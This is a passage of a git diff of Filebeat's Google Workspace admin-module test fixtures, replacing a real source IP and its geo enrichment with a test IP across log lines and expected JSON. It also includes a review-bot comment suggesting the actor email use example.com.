- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1049,7 +973,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1062,26 +986,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 9047,
+ "log.offset": 9028,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1103,7 +1023,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1119,26 +1039,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 9465,
+ "log.offset": 9445,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log
index 5aececc68aac..40ae2ee7166a 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log
@@ -1 +1 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json
index 50adf8044be5..53e72d481039 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json
@@ -9,7 +9,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -28,23 +28,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log
index da76df3f7673..9de35080e1c7 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
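Review bot: The fixture's actor identity still points at `bar.com` (in `"email":"foo@bar.com"` on every added line), which appears to be a real, registrable third-party domain rather than an RFC 2606 reserved one, so the same concern that motivated moving `ipAddress` to the reserved test address `67.43.156.13` applies here too. The `USER_EMAIL` parameter in the ASSIGN_ROLE/UNASSIGN_ROLE lines already uses `user@example.com`, so the actor could follow suit with `"email":"foo@example.com"`. If that is changed, the derived `source.user.domain`, `source.user.email` and `related.user` values in the `-expected.json` file, and the `log.offset` of every later event, would need regenerating rather than hand-editing.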
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json
index 608736f71670..6c8c2c780f63 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -25,24 +25,20 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -66,7 +62,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -79,26 +75,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 483, + "log.offset": 482, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -119,7 +111,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -132,26 +124,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 912, + "log.offset": 910, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -172,7 +160,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "event.provider": "admin", "event.type": [ "change" 
